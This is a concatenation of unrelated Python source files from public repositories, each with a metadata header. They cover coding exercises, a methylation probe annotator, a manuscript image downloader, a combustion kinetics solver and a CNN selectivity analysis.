4cbf74972009ba2bd09861f655898cb9982640c5 | Python | kingbj940429/Coding_Test_Solution | /this_is_cote/4_2.py | UTF-8 | 446 | 3.6875 | 4 | [] | no_license | ''' 4-2 시각 '''
'''
접근
1) 시간에 만약 3이 있으면 break 걸고 cnt 증가
2) 분과 초는 0~59 까지임
'''
N = int(input())
cnt = 0
for i in range(N+1):
if(i%10 == 3):
cnt += 60*60
else:
for j in range(60):
if('3' in str(j)):
cnt += 60
else:
for k in range(60):
if('3' in str(k)):
cnt += 1
print(cnt)
| true |
ca5703545c79064f10daca80626b13268e25764c | Python | MuhammadAzizulHakim/Python-Codecademy_Solutions | /10. Advanced Topics in Python - b. Introduction to Bitwise Operators/4. Binary Representation - The bin() Function.py | UTF-8 | 197 | 2.765625 | 3 | [] | no_license | print bin(1)
print bin(2)
print bin(3)
print bin(4)
print bin(5)
print oct(1)
print oct(2)
print oct(3)
print oct(4)
print oct(5)
print hex(1)
print hex(2)
print hex(3)
print hex(4)
print hex(5)
| true |
ccc2453c83d62885d71e1beab2198487c735a0c3 | Python | chenyidao110/python | /day011/test01.py | UTF-8 | 499 | 3.609375 | 4 | [] | no_license | import random
f1 = 0
f2 = 0
f3 = 0
f4 = 0
f5 = 0
f6 = 0
for _ in range(6000):
face = random.randint(1,6)
if face == 1:
f1 += 1
elif face == 2:
f2 += 1
elif face == 3:
f3 += 1
elif face == 4:
f4 += 1
elif f5 == 5:
f5 += 1
else:
f6 += 1
print(f'1点出现了{f1}次')
print(f'2点出现了{f2}次')
print(f'3点出现了{f3}次')
print(f'4点出现了{f4}次')
print(f'5点出现了{f5}次')
print(f'6点出现了{f6}次') | true |
9e637fd56e07fc1213799cef83b4531727659413 | Python | atallah-lab/methylation | /python/methylator/annotation/annotate_450k_ORIGINAL.py | UTF-8 | 7,483 | 2.875 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
import os
class Probe:
"""
Holds Illumina 450k probe info for a single CpG site.
"""
def __init__(self):
self.id = None
self. seq = None
self.name = None
self.chr = None
self.cord = None
self.strand = None
self.gene = None
self.refseq = None
self.tour = None
self.loc = None
class Interval:
"""
Define a genomic interval by chromsome and strand orientation.
"""
def __init__(self, chromosome, start, end, strand):
self.chr = chromosome
self.start = start
self.end = end
self.strand = strand
class Location:
"""
Define a Probe location.
"""
BODY = "Body"
TSS200 = "TSS200"
TSS1500 = "TSS1500"
UTR5 = "5'UTR"
UTR3 = "3'UTR"
EXON = "Exon"
class CpG_location:
"""
Defines a CpG location.
"""
ISLAND = "Island"
NSHORE = "N_Shore"
SSHORE = "S_Shore"
NSHELF = "N_Shelf"
SSHELF = "S_Shelf"
class SNP:
"""
Defines the SNPs in probes. Used to filter probes.
"""
def __init__(self):
self.probeid = None
self.snpid = None
class Annotate_450k:
"""
Parse and hold information about Illumina probes.
"""
def __init__(self):
for i in open(anno_file, mode="r"):
self.ann = os.path.join("../../data/", i.strip("\n").strip("\r"))
self.probe = {}
self.__run__()
def __run__(self):
"""
A static function to setup the Probe classes.
"""
for i in open(self.ann, mode="r"):
if i.startswith("cg"):
data = i.split(",")
# Assign probe information.
new_probe = Probe()
new_probe.id = data[0]
new_probe.name = data[1]
new_probe.seq = data[13]
new_probe.chr = str(data[11])
new_probe.cord = int(data[12])
new_probe.strand = data[16]
new_probe.gene = data[21].split(";")
new_probe.refseq = data[22]
locs = data[23].split(";")
list_locs = []
for i in locs:
if i not in list_locs:
list_locs.append(i)
new_probe.loc = list_locs
new_probe.tour = data[25]
newcpg = {new_probe.id: new_probe}
self.probe.update(newcpg)
def get_probe(self, probe_id): #WORKS
"""
Return probe info associated with an reference.
"""
try:
probe = self.probe[probe_id]
except Exception as ex:
probe = None
print("WARNING: No probe with ref-id of %s found." % probe_id)
return probe
def get_all_probes(self):
"""
Return list of all probes.
"""
probe_list = []
for probe in self.probe.keys():
probe_list.append(self.get_probe(probe))
return probe_list
def get_probes_by_list(self, list_of_ids):
"""
Return a list of probes from a list of references.
"""
out_list = []
for probe_id in list_of_ids:
out_list.append(self.get_probe(probe_id))
return out_list
def get_probe_refs_by_gene(self, gene_name):
"""
Get all probe references associated with a gene.
"""
probes = {k: self.probe[k] for k in self.probe if gene_name in self.probe[k].gene}
return self.get_keys(probes.keys())
def get_probe_refs_by_location(self, probe_loc):
"""
Get all probe references associated with a genomic location.
"""
probes = {k: self.probe[k] for k in self.probe if probe_loc in self.probe[k].loc}
return self.get_keys(probes.keys())
def get_keys(self, dic_keys):
"""
Get Probe reference from probe dictionaries.
"""
l = []
for i in dic_keys:
l.append(i)
return l
def get_probes_by_gene(self, gene_name):
"""
Return list of probes for an associated gene.
"""
return self.get_probes_by_list(self.get_probe_refs_by_gene(gene_name))
def get_probes_by_location(self, loc):
"""
Return list of probes from genomic location.
"""
return self.get_probes_by_list(self.get_probe_refs_by_location(loc))
def get_probes_by_cpg(self, cpg_loc):
"""
Get a list probes from cpg location.
FIXME
"""
return self.get_probes_by_list(self.get_probes_by_cpg(cpg_loc))
def get_probes_by_chr(self, chr_loc):
"""
Get a list of probes within a certain genomic region
FIXME
"""
print (chr_loc.chr)
probes = {k: self.probe[k] for k in self.probe if
self.probe[k].chr == chr_loc.chr}
def get_probes_by_chr_and_loc(self, chr_loc):
"""
Get a list of probes within a certain genomic region
FIXME
"""
chrom = chr_loc.chr
start = int(chr_loc.start)
end = int(chr_loc.end)
#print (chrom, start, stop)
probes = {k: self.probe[k] for k in self.probe if
self.probe[k].chr == chrom and start < self.probe[k].cord < end}
return probes
def get_probe_keys_by_chr_and_loc(self, chr_loc):
"""
Get a list of probe reference *keys* within a genomic region
FIXME
"""
probes = self.get_probes_by_chr_and_loc(chr_loc)
return self.get_keys(probes)
def get_number(self):
"""
Return total number of probes.
"""
number = 0
for probe_id in self.probe.keys():
number += 1
return number
def get_coord(self, probe):
"""
Get genomic coordinate of a single probe.
"""
return probe.cord
def get_sorted_probes_by_id(self):
"""
Sort probes according to probe id.
"""
sorted_keys = sorted(list(self.probe.keys()))
return sorted_keys
def get_sorted_probes_by_chr(self):
"""
Sort probes according to probe id.
"""
return sorted(self.get_all_probes(), key=lambda x: x.chr)
def remove_snp_probes(self):
"""
Removes all SNPs associated with probes.
"""
snp_list = []
snp_file = open("../../data/humanmethylation450_dbsnp137.snpupdate.table.v2.sorted.txt", "r")
for line in snp_file:
if line.startswith("cg"):
line = line.strip("\n").strip("\r").split("\t")
new_snp = SNP()
new_snp.probeid = line[0]
new_snp.snpid = line[1]
snp_list.append(new_snp)
for snp in snp_list:
self.probe.pop(snp.probeid)
anno_file = os.path.abspath("../../data/config.ini") # Illumina probe manifest. Note: This (large) file is not
# in the repository.
# Functions to save/load dictionary objects.
import _pickle as pickle
def save_obj(obj, name):
with open('../../data/pickle/'+ name + '.pkl', 'wb+') as f:
pickle.dump(obj, f)
def load_obj(name):
with open('../../data/pickle/' + name + '.pkl', 'rb') as f:
return pickle.load(f)
| true |
9e08998912edee7f12d655b345d73a795fdb285a | Python | masyagin1998/robin | /src/dataset/stsl-download.py | UTF-8 | 2,933 | 2.828125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/python3
import argparse
import asyncio
import os
import time
from multiprocessing import (cpu_count)
from urllib.request import urlopen
import cv2
import numpy as np
async def save_img(link: str, path: str):
"""Get image via HTTP and save it asynchronously."""
cv2.imwrite(path, cv2.imdecode(np.asarray(bytearray(urlopen(link).read()), dtype='uint8'), cv2.IMREAD_COLOR))
async def save_imgs(link_path_pairs: [(str, str)]):
"""Get images via HTTP and save them asynchronously."""
await asyncio.wait([save_img(p[0], p[1]) for p in link_path_pairs])
def mkdir_s(path: str):
"""Create directory in specified path, if not exists."""
if not os.path.exists(path):
os.makedirs(path)
desc_str = r"""Download images from Trinity Lavra of St. Sergius - one of the most important Russian monastery.
Unfortunately, there are very few tagged data for binarizing document images, so sooner or later
you will want to create your own dataset. One of the best sources for data is the archive of
the Trinity-Sergius Lavra, because there are many old books in its archive, that answer the main
problems of the old documents. This script makes it easy to download books from there.
"""
def parse_args():
"""Get command line arguments."""
parser = argparse.ArgumentParser(prog='stsl-download',
formatter_class=argparse.RawDescriptionHelpFormatter,
description=desc_str)
parser.add_argument('-v', '--version', action='version', version='%(prog)s v0.1')
parser.add_argument('-l', '--link', type=str, default='',
help=r'part of link to book (for example: "http://old.stsl.ru/files/manuscripts/oldprint/1600-IV-1026/1026-").')
parser.add_argument('-b', '--begin', type=int, default=0,
help=r'beginning number (default: %(default)s)')
parser.add_argument('-e', '--end', type=int, default=0,
help=r'ending number (default: %(default)s)')
parser.add_argument('-o', '--output', type=str, default=os.path.join('.', 'output'),
help=r'directory for output train and ground-truth images suitable for U-net (default: "%(default)s")')
return parser.parse_args()
def main():
start_time = time.time()
args = parse_args()
if args.link == '':
print('no link specified, stopping program')
else:
mkdir_s(args.output)
links = [((args.link + '{0:04d}.jpg').format(i),
os.path.join(args.output, str(i) + '_in.png'))
for i in range(args.begin, args.end + 1)]
event_loop = asyncio.get_event_loop()
try:
event_loop.run_until_complete(save_imgs(links))
finally:
event_loop.close()
print('finished in {0:.2f} seconds'.format(time.time() - start_time))
if __name__ == '__main__':
main()
| true |
84204ae869e84cc7036bbe8f2707fb39ca18f01a | Python | Alex-Muirhead/AERO4450_MAP1 | /code/combustionSolver.py | UTF-8 | 4,342 | 2.71875 | 3 | [] | no_license | import math
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from scipy import integrate
from scipy import interpolate
Ru = 8.314 # kJ/kmol.K
pRef = 100 # kPa
plt.style.use("PaperDoubleFig.mplstyle")
def lin(lower, upper, deltaX):
deltaY = upper - lower
grad = deltaY / deltaX
def inner(x):
return lower + grad*x
return inner
def vectorInterface(lengths):
L = [0, *np.cumsum(lengths)]
def wrapper(func):
def inner(t, args):
splitArgs = [args[l:r] for l, r in zip(L[:-1], L[1:])]
output = func(t, *splitArgs)
return np.hstack([*output])
return inner
return wrapper
# (row) species 0 :: C2H4
# 1 :: O2
# 2 :: CO
# 3 :: H2O
# 4 :: CO2
# (col) reaction 0 :: C2H4 + 2 O2 --> 2 CO + 2 H2O
# 1 :: CO + 1/2 O2 <-> CO2
# Stoichiometric coefficients
ν = np.array([
[-1., 0. ],
[-2., -0.5],
[ 2., -1. ],
[ 2., 0. ],
[ 0., 1. ]
]).T
# Experimental partial powers
νExp = np.array([
[0.5 , 0. ],
[0.65, 0.5],
[2. , 1. ],
[2. , 0. ],
[0. , 1. ]
]).T
# Forward and reverse masks
maskF = np.zeros_like(ν, dtype=bool)
maskR = np.zeros_like(ν, dtype=bool)
maskF[ν < 0.] = True
maskR[ν > 0.] = True
chemData = []
for species in ("C2H4", "O2", "CO", "H2O", "CO2"):
data = pd.read_csv(f"chemData/{species}.txt", sep="\t", skiprows=1)
chemData.append(data[1:]) # Skip T=0K
logKfuncs, deltaHfuncs = [], []
for data in chemData:
T = data["T(K)"].values.astype(float)
logKf = data["log Kf"].values.astype(float)
deltaH = data["delta-f H"].values.astype(float) * 1e+03 # kJ/mol->kJ/kmol
logKfuncs.append(interpolate.interp1d(T, logKf, kind="quadratic"))
deltaHfuncs.append(interpolate.interp1d(T, deltaH, kind="quadratic"))
def Kc(T, p):
"""Kc = Kp * pow(pRef/Ru*T, νExp+...)"""
# NOTE: Account for partial pressures
Kf_i = np.array([pow(10, Kf(T)) for Kf in logKfuncs]) * (pRef/(Ru*T))
forward = pow(Kf_i, maskF*νExp)
reverse = pow(Kf_i, maskR*νExp)
return np.prod(reverse, axis=1) / np.prod(forward, axis=1)
def arrhenius(T):
return np.array([
1.739e+09 * math.exp(-1.485e+05 / (Ru*T)),
6.324e+07 * math.exp(-5.021e+04 / (Ru*T))
])
ΔT = 0.1e-03
temp = lin(1400, 2800, ΔT) # K
pres = lin(70, 140, ΔT) # kPa
@vectorInterface((5, 1))
def gradient(t, χ, h):
limit = (χ < 0)
χ[limit] = 0
# Would normally calculate T from h = \int cp(T) dT
T , p = temp(t), pres(t)
kf = arrhenius(T)
kr = kf / Kc(T, p)
kr[0] = 0 # One way reaction
forward = kf * np.prod(pow(χ, maskF*νExp), axis=1)
reverse = kr * np.prod(pow(χ, maskR*νExp), axis=1)
χGrad = ν.T @ forward - ν.T @ reverse
χGrad[(χGrad < 0)*limit] = 0
hGrad = -sum([dχ_i*h_i(T) for dχ_i, h_i in zip(χGrad, deltaHfuncs)])
return χGrad, hGrad
n = 1 + 3*(1 + 3.76)
χ0 = np.array(
[1/n, 3/n, 0.0, 0.0, 0.0]
) * 70 / (Ru * 1400)
sol = integrate.solve_ivp(
gradient, (0, ΔT), np.append(χ0, 0.),
method="LSODA", events=None,
atol=1e-10, rtol=1e-10
)
t, y = sol.t, sol.y
print(f"The heat released is {y[-1][-1]*1e-03:.3f} MJ/m^3")
print(np.array([1/n, 3/n, 0.0, 0.0, 0.0]))
fig, ax = plt.subplots()
formula = ("C$_2$H$_4$", "O$_2$", "CO", "H$_2$O", "CO$_2$")
[ax.plot(t*1e+06, y[i]*1e+03, label=formula[i]) for i in range(5)]
ax.legend()
ax.set_xlim([0, 100])
plt.xlabel(r"Time [$\mu$s]")
plt.ylabel("Concentration [mol/m$^3$]")
plt.title("Concentration of species over combustion")
plt.savefig("../images/concentration.pdf")
fig, ax = plt.subplots()
ax.plot(sol.t*1e+06, sol.y[-1]*1e-03, "k-", label="Net heat")
ax.legend()
ax.set_xlim([0, 100])
ax.set_ylim([0, 0.5])
plt.xlabel(r"Time [$\mu$s]")
plt.ylabel("Net heat [MJ/m$^3$]")
plt.title("Net heat release from combustion")
plt.savefig("../images/netHeat.pdf")
fig, ax = plt.subplots()
ax.plot(
sol.t*1e+06,
np.gradient(sol.y[-1], sol.t)*1e-06,
"k-", label="Heat rate"
)
ax.legend()
ax.set_xlim([0, 100])
ax.set_ylim([-5, 15])
plt.xlabel(r"Time [$\mu$s]")
plt.ylabel("Rate of heat [GW/m$^3$]")
plt.title("Rate of heat of combustion")
plt.savefig("../images/heatRate.pdf")
plt.show()
| true |
94a4340451170e345774112b46b8d31d7ad4df13 | Python | DeonC/rock-paper-scissors | /rps.py | UTF-8 | 1,064 | 3.90625 | 4 | [] | no_license | p1_score: int = 0
cpu_score: int = 0
def game():
from random import randint
wins = "You won! \n"
lose = " You loose! \n"
global p1_score
global cpu_score
ai = randint(0, 2)
if ai == 0:
ai = "Rock"
elif ai == 1:
ai = "Paper"
else:
ai = "Scissor"
# 0 = rock, 1 = paper, 2 = scissor
p1 = input("Make your move:")
p1 = p1.title()
if p1 == "Rock" and ai == "Scissor":
print(wins)
if wins:
p1_score += 1
print(f"User: {p1_score} CPU: {cpu_score}")
elif p1 == "Paper" and ai == "Rock":
print(wins)
if wins:
p1_score += 1
print(f"User: {p1_score} CPU: {cpu_score}")
elif p1 == "Scissor" and ai == "Paper":
print(wins)
if wins:
p1_score += 1
print(f"User: {p1_score} CPU: {cpu_score}")
elif p1 == ai:
print("Draw")
else:
cpu_score += 1
print(ai + "," + lose)
print(f"User: {p1_score} CPU: {cpu_score}")
game()
game()
| true |
bfe07c203c8e06b0896962b18edab897daad8aa7 | Python | bptripp/it-cnn | /tuning/selectivity.py | UTF-8 | 13,967 | 2.671875 | 3 | [
"MIT"
] | permissive | __author__ = 'bptripp'
from cnn_stimuli import get_image_file_list
import cPickle as pickle
import time
import numpy as np
import matplotlib.pyplot as plt
from alexnet import preprocess, load_net, load_vgg
def excess_kurtosis(columns):
    """
    Return the excess kurtosis of each column of a 2D array.

    Vectorized equivalent of applying calculate_kurtosis to every column:
    kurtosis_j = mean((x_j - mean_j)**4) / sigma_j**4 - 3, so a Gaussian
    column gives 0.

    :param columns: 2D array (samples x variables).
    :return: 1D array with one excess-kurtosis value per column.
    """
    m = np.mean(columns, axis=0)
    sd = np.std(columns, axis=0)
    # Fourth central moment per column over sigma^4, minus 3.
    # NOTE: a zero-variance column divides by zero (NaN/inf), matching
    # the behavior of a per-column loop implementation.
    d = columns - m
    return np.mean(d**4, axis=0) / sd**4 - 3
# Copying these two functions from Salman's repo,
# ObjectSelectivity/sparseness.py and ObjectSelectivity/kurtosis_selectivity_profile.py
def calculate_kurtosis(rates_per_object):
    """
    Given an array of firing rates of the neuron to objects, return the sparseness metric
    Kurtosis (actually excess kurtosis) of the neuron as defined in:

    [1] Lehky, S. R., Kiani, R., Esteky, H., & Tanaka, K. (2011). Statistics of
        visual responses in primate inferotemporal cortex to object stimuli.
        Journal of Neurophysiology, 106(3), 1097-117.

    Kurtosis = (sum (Ri - Rmean)**4 / (n*sigma**4)) - 3

    :param rates_per_object: array of firing rates of the neuron to multiple objects.
    :return: kurtosis sparseness.

    This is defined outside the class as it is used by other selectivity profiles.
    """
    # np.float was deprecated and removed in NumPy >= 1.24; the builtin
    # float is the exact equivalent on every NumPy version.
    n = float(rates_per_object.shape[0])

    rates_mean = np.mean(rates_per_object)
    rates_sigma = np.std(rates_per_object)

    kurtosis = np.sum((rates_per_object - rates_mean)**4) / (n * rates_sigma**4) - 3

    return kurtosis
def activity_fraction(rates_per_object):
    """
    Return the activity-fraction sparseness of a neuron's responses.

    Computes n/(n-1) * (1 - (sum R/n)**2 / (sum R**2/n)).  For non-negative
    rates this is 0 when the neuron responds equally to every object and 1
    when it responds to exactly one object.

    :param rates_per_object: array of firing rates of the neuron to multiple objects.
    :return: activity-fraction sparseness (in [0, 1] for non-negative rates).
    """
    R = rates_per_object
    n = len(rates_per_object)
    return n/(n-1) * ( 1 - np.sum(R/n)**2 / np.sum(R**2/n) )
def plot_selectivity_and_sparseness(r_mat, font_size=10):
    """Plot histograms of kurtosis-based selectivity and sparseness.

    Top panel: single-neuron selectivity -- kurtosis across objects for
    each row of r_mat. Bottom panel: population sparseness -- kurtosis
    across neurons for each column. Mean/median/n are printed to stdout
    and annotated on each panel.

    :param r_mat: 2-D response matrix, neurons x objects
    :param font_size: font size for axis labels and annotations
    """
    # plt.figure(figsize=)
    # fig = plt.figure()
    # print(fig.get_size_inches())
    # f, ax_arr = plt.subplots(2, 1, sharex=True, figsize=(3.5,5))
    f, ax_arr = plt.subplots(2, 1, sharex=False, figsize=(3,5))
    # Single Neuron selectivities
    n_neurons = r_mat.shape[0]
    n_objs = r_mat.shape[1]
    selectivities = np.zeros(n_neurons)
    sparsenesses = np.zeros(n_objs)
    for n_idx in np.arange(n_neurons):
        rates = r_mat[n_idx, :]
        selectivities[n_idx] = calculate_kurtosis(rates)
    for o_idx in np.arange(n_objs):
        rates = r_mat[:, o_idx]
        sparsenesses[o_idx] = calculate_kurtosis(rates)
    print(np.mean(selectivities))
    print(np.mean(sparsenesses))
    print('min selectivity: ' + str(np.min(selectivities)))
    print('max selectivity: ' + str(np.max(selectivities)))
    # Plot selectivities ------------------------------------------------
    # Values are clipped to [-10, 25] for display only; stats above use raw values.
    ax_arr[0].hist(np.clip(selectivities, -10, 25), bins=np.arange(-5, 850, step=1), color='red')
    ax_arr[0].set_ylabel('frequency', fontsize=font_size)
    ax_arr[0].set_xlabel('kurtosis', fontsize=font_size)
    ax_arr[0].tick_params(axis='x', labelsize=font_size)
    ax_arr[0].tick_params(axis='y', labelsize=font_size)
    # ax_arr[0].set_xlim([0.1, 850])
    ax_arr[0].annotate('mean=%0.2f' % np.mean(selectivities),
                       xy=(0.55, 0.98),
                       xycoords='axes fraction',
                       fontsize=font_size,
                       horizontalalignment='left',
                       verticalalignment='top')
    ax_arr[0].annotate('med.=%0.2f' % np.median(selectivities),
                       xy=(0.55, 0.88),
                       xycoords='axes fraction',
                       fontsize=font_size,
                       horizontalalignment='left',
                       verticalalignment='top')
    ax_arr[0].annotate('n=%d' % len(selectivities),
                       xy=(0.55, 0.78),
                       xycoords='axes fraction',
                       fontsize=font_size,
                       horizontalalignment='left',
                       verticalalignment='top')
    ax_arr[0].annotate('single-neuron',
                       xy=(0.01, 0.98),
                       xycoords='axes fraction',
                       fontsize=font_size,
                       horizontalalignment='left',
                       verticalalignment='top')
    # ax_arr[0].set_ylim([0, 40])
    # ax_arr[0].set_xlim([0, 200])
    # ax_arr[0].set_ylim([0, 130])
    # ax_arr[0].set_xscale('log')
    # Plot sparsenesses ------------------------------------------------
    # Display clipped to [-10, 60]; coarser bin width than the top panel.
    ax_arr[1].hist(np.clip(sparsenesses, -10, 60), bins=np.arange(-5, 850, step=3))
    ax_arr[1].set_ylabel('frequency', fontsize=font_size)
    ax_arr[1].set_xlabel('kurtosis', fontsize=font_size)
    ax_arr[1].tick_params(axis='x', labelsize=font_size)
    ax_arr[1].tick_params(axis='y', labelsize=font_size)
    ax_arr[1].annotate('mean=%0.2f' % np.mean(sparsenesses),
                       xy=(0.55, 0.98),
                       xycoords='axes fraction',
                       fontsize=font_size,
                       horizontalalignment='left',
                       verticalalignment='top')
    ax_arr[1].annotate('med.=%0.2f' % np.median(sparsenesses),
                       xy=(0.55, 0.88),
                       xycoords='axes fraction',
                       fontsize=font_size,
                       horizontalalignment='left',
                       verticalalignment='top')
    ax_arr[1].annotate('n=%d' % len(sparsenesses),
                       xy=(0.55, 0.78),
                       xycoords='axes fraction',
                       fontsize=font_size,
                       horizontalalignment='left',
                       verticalalignment='top')
    ax_arr[1].annotate('population',
                       xy=(0.01, 0.98),
                       xycoords='axes fraction',
                       fontsize=font_size,
                       horizontalalignment='left',
                       verticalalignment='top')
    ax_arr[0].set_xlim([-2, 26])
    ax_arr[1].set_xlim([-2, 62])
    # ax_arr[1].set_ylim([0, 300])
    plt.tight_layout()
    # ax_arr[1].set_xscale('log')
if False:
with open('face-preference-alexnet-0.pkl', 'rb') as file:
alexnet0 = pickle.load(file)
with open('face-preference-alexnet-1.pkl', 'rb') as file:
alexnet1 = pickle.load(file)
with open('face-preference-alexnet-2.pkl', 'rb') as file:
alexnet2 = pickle.load(file)
with open('face-preference-vgg-0.pkl', 'rb') as file:
vgg0 = pickle.load(file)
with open('face-preference-vgg-1.pkl', 'rb') as file:
vgg1 = pickle.load(file)
with open('face-preference-vgg-2.pkl', 'rb') as file:
vgg2 = pickle.load(file)
edges = np.linspace(-5, 5, 21)
plt.figure(figsize=(8,4.5))
plt.subplot(2,3,1)
plt.hist(alexnet2, edges)
plt.ylabel('AlexNet Unit Count', fontsize=16)
plt.title('output-2', fontsize=16)
plt.subplot(2,3,2)
plt.hist(alexnet1, edges)
plt.title('output-1', fontsize=16)
plt.subplot(2,3,3)
plt.hist(alexnet0, edges)
plt.title('output', fontsize=16)
plt.subplot(2,3,4)
plt.hist(vgg2, edges, color='g')
plt.ylabel('VGG Unit Count', fontsize=16)
plt.subplot(2,3,5)
plt.hist(vgg1, edges, color='g')
plt.xlabel('Preference for Face Images', fontsize=16)
plt.subplot(2,3,6)
plt.hist(vgg0, edges, color='g')
plt.tight_layout(pad=0.05)
plt.savefig('../figures/selectivity-faces.eps')
plt.show()
if False:
use_vgg = True
remove_level = 2
if use_vgg:
model = load_vgg(weights_path='../weights/vgg16_weights.h5', remove_level=remove_level)
else:
model = load_net(weights_path='../weights/alexnet_weights.h5', remove_level=remove_level)
image_files = get_image_file_list('./images/lehky-processed/', 'png', with_path=True)
im = preprocess(image_files, use_vgg=use_vgg)
print(image_files)
mainly_faces = [197]
mainly_faces.extend(range(170, 178))
mainly_faces.extend(range(181, 196))
mainly_faces.extend(range(203, 214))
mainly_faces.extend(range(216, 224))
faces_major = [141, 142, 165, 169, 179, 196, 214, 215, 271]
faces_major.extend(range(144, 147))
faces_major.extend(range(157, 159))
faces_present = [131, 143, 178, 180, 198, 230, 233, 234, 305, 306, 316, 372, 470]
faces_present.extend(range(134, 141))
faces_present.extend(range(147, 150))
faces_present.extend(range(155, 157))
faces_present.extend(range(161, 165))
faces_present.extend(range(365, 369))
faces_present.extend(faces_major)
faces_present.extend(mainly_faces)
faces_ind = []
for i in range(len(image_files)):
for j in range(len(mainly_faces)):
if str(mainly_faces[j]) + '.' in image_files[i]:
faces_ind.append(i)
no_faces_ind = []
for i in range(len(image_files)):
has_face = False
for j in range(len(faces_present)):
if str(faces_present[j]) + '.' in image_files[i]:
has_face = True
if not has_face:
no_faces_ind.append(i)
# print(faces_ind)
# print(no_faces_ind)
start_time = time.time()
out = model.predict(im)
print(out.shape)
f = out[faces_ind,:]
nf = out[no_faces_ind,:]
print(f.shape)
print(nf.shape)
face_preference = np.mean(f, axis=0) - np.mean(nf, axis=0)
vf = np.var(f, axis=0) + 1e-3 # small constant in case zero variance due to lack of response
vnf = np.var(nf, axis=0) + 1e-3
d_prime = face_preference / np.sqrt((vf + vnf)/2)
network_name = 'vgg' if use_vgg else 'alexnet'
with open('face-preference-' + network_name + '-' + str(remove_level) + '.pkl', 'wb') as file:
pickle.dump(d_prime, file)
print(d_prime)
plt.hist(d_prime)
plt.show()
# Main analysis: run the Lehky stimulus set through AlexNet or VGG, select
# responsive units, and plot selectivity/sparseness kurtosis histograms.
if True:
    use_vgg = False
    remove_level = 1
    if use_vgg:
        model = load_vgg(weights_path='../weights/vgg16_weights.h5', remove_level=remove_level)
    else:
        model = load_net(weights_path='../weights/alexnet_weights.h5', remove_level=remove_level)
    # model = load_net(weights_path='../weights/alexnet_weights.h5')
    image_files = get_image_file_list('./images/lehky-processed/', 'png', with_path=True)
    im = preprocess(image_files, use_vgg=use_vgg)
    start_time = time.time()
    out = model.predict(im)
    print('prediction time: ' + str(time.time() - start_time))
    # with open('lehky.pkl', 'wb') as file:
    #     pickle.dump(out, file)
    # with open('lehky.pkl', 'rb') as file:
    #     out = pickle.load(file)
    n = 674
    # use first n or n with greatest responses
    if False:
        rect = np.maximum(0, out[:,:n])
    else:
        # Take the first n units whose peak response exceeds 2, then rectify.
        maxima = np.max(out, axis=0)
        ind = np.zeros(n, dtype=int)
        c = 0
        i = 0
        while c < n:
            if maxima[i] > 2:
                ind[c] = i
                c = c + 1
            i = i + 1
        # ind = (-maxima).argsort()[:n]
        rect = np.maximum(0, out[:,ind])
    # Selectivity: kurtosis per unit (columns); sparseness: per image (rows).
    selectivity = excess_kurtosis(rect)
    sparseness = excess_kurtosis(rect.T)
    print(np.mean(selectivity))
    print(np.mean(sparseness))
    print(np.max(selectivity))
    print(np.max(sparseness))
    plot_selectivity_and_sparseness(rect.T, 11)
    network_name = 'vgg' if use_vgg else 'alexnet'
    plt.savefig('../figures/selectivity-' + network_name + '-' + str(remove_level) + '-talk.eps')
    plt.show()
if False:
plt.figure(figsize=(4,3.8))
plt.scatter(3.5, 12.51, c='k', marker='x', s=40, label='IT') # from Lehky et al. Fig 4A and 4B
selectivity_alexnet = [10.53, 28.59, 31.44]
sparseness_alexnet = [4.04, 8.85, 6.61]
selectivity_vgg = [26.79, 14.44, 34.65]
sparseness_vgg = [6.59, 3.40, 3.54]
plt.scatter([10.53, 28.59, 31.44], [4.04, 8.85, 6.61], c='b', marker='o', s=30, label='Alexnet')
plt.scatter([26.79, 14.44, 34.65], [6.59, 3.40, 3.54], c='g', marker='s', s=45, label='VGG-16')
plt.plot([0, 40], [0, 40], 'k')
plt.xlim([0,38])
plt.ylim([0,38])
gap = 0.4
plt.text(3.5+gap, 9.61+gap+.05, 'IT')
plt.text(selectivity_alexnet[0]+gap, sparseness_alexnet[0]+gap, 'out')
plt.text(selectivity_alexnet[1]+gap, sparseness_alexnet[1]+gap, 'out-1')
plt.text(selectivity_alexnet[2]+gap, sparseness_alexnet[2]+gap, 'out-2')
plt.text(selectivity_vgg[0]+gap, sparseness_vgg[0]+gap, 'out')
plt.text(selectivity_vgg[1]+gap, sparseness_vgg[1]+gap, 'out-1')
plt.text(selectivity_vgg[2]+gap, sparseness_vgg[2]+gap, 'out-2')
plt.xlabel('Selectivity')
plt.ylabel('Sparseness')
plt.tight_layout()
plt.savefig('../figures/cnn-selectivity.eps')
plt.show()
if False:
r_mat = rect.T
n_neurons = r_mat.shape[0]
activity_fractions = np.zeros(n_neurons)
for n_idx in np.arange(n_neurons):
rates = r_mat[n_idx, :]
activity_fractions[n_idx] = activity_fraction(rates)
print(activity_fractions)
plt.plot(activity_fractions)
plt.show()
rate = np.mean(rect,0)
# with open('activity-fraction.pkl', 'wb') as file:
# pickle.dump((ind, activity_fractions), file)
# bins = np.linspace(0, 1000, 501)
# plt.figure()
# plt.subplot(2,1,1)
# plt.hist(selectivity, bins)
# # plt.xlim([0, 100])
# # plt.ylim([0, 100])
# plt.subplot(2,1,2)
# plt.hist(sparseness, bins)
# # plt.xlim([0, 100])
# # plt.ylim([0, 100])
# plt.show()
#
# note: there is a NaN due to single kurtosis much less than gaussian
# print(np.corrcoef(np.mean(rect,0), np.log(selectivity+1)))
# plt.figure()
# plt.scatter(np.mean(rect,0), np.log(selectivity+1))
# plt.gca().set_xscale('log')
# plt.gca().set_yscale('log')
# plt.show()
#
# rate = np.mean(rect,0)
# with open('rate-vs-selectivity.pkl', 'wb') as file:
# pickle.dump((ind, rate, selectivity), file)
| true |
140c328d2811837ddd23f8a08b04535f16095430 | Python | jorgediazjr/dials-dev20191018 | /modules/cctbx_project/cctbx/examples/symops_530.py | UTF-8 | 1,277 | 2.984375 | 3 | [
"BSD-3-Clause-LBNL",
"BSD-3-Clause"
] | permissive | """\
Loop over 530 conventional settings of the 230 space groups,
show symmetry operations in various formats.
See also:
List of 530 settings:
Shmueli U, Hall SR, Grosse-Kunstleve RW:
Space-Group Symbols for numeric and symbolic computations.
In International Tables for Crystallography, Volume B:
Reciprocal space, U. Shmueli, Ed.,
Kluwer Academic Publishers (Dordrecht), 2001, 107-119.
Universal Hermann-Mauguin symbols: section 2.1 of:
Zwart P, Grosse-Kunstleve RW, Lebedev AA, Murshudov GN, Adams PD:
Surprises and pitfalls arising from(pseudo)symmetry
Acta Cryst. 2008, D64, 99-107.
http://scripts.iucr.org/cgi-bin/paper?ba5111
"""
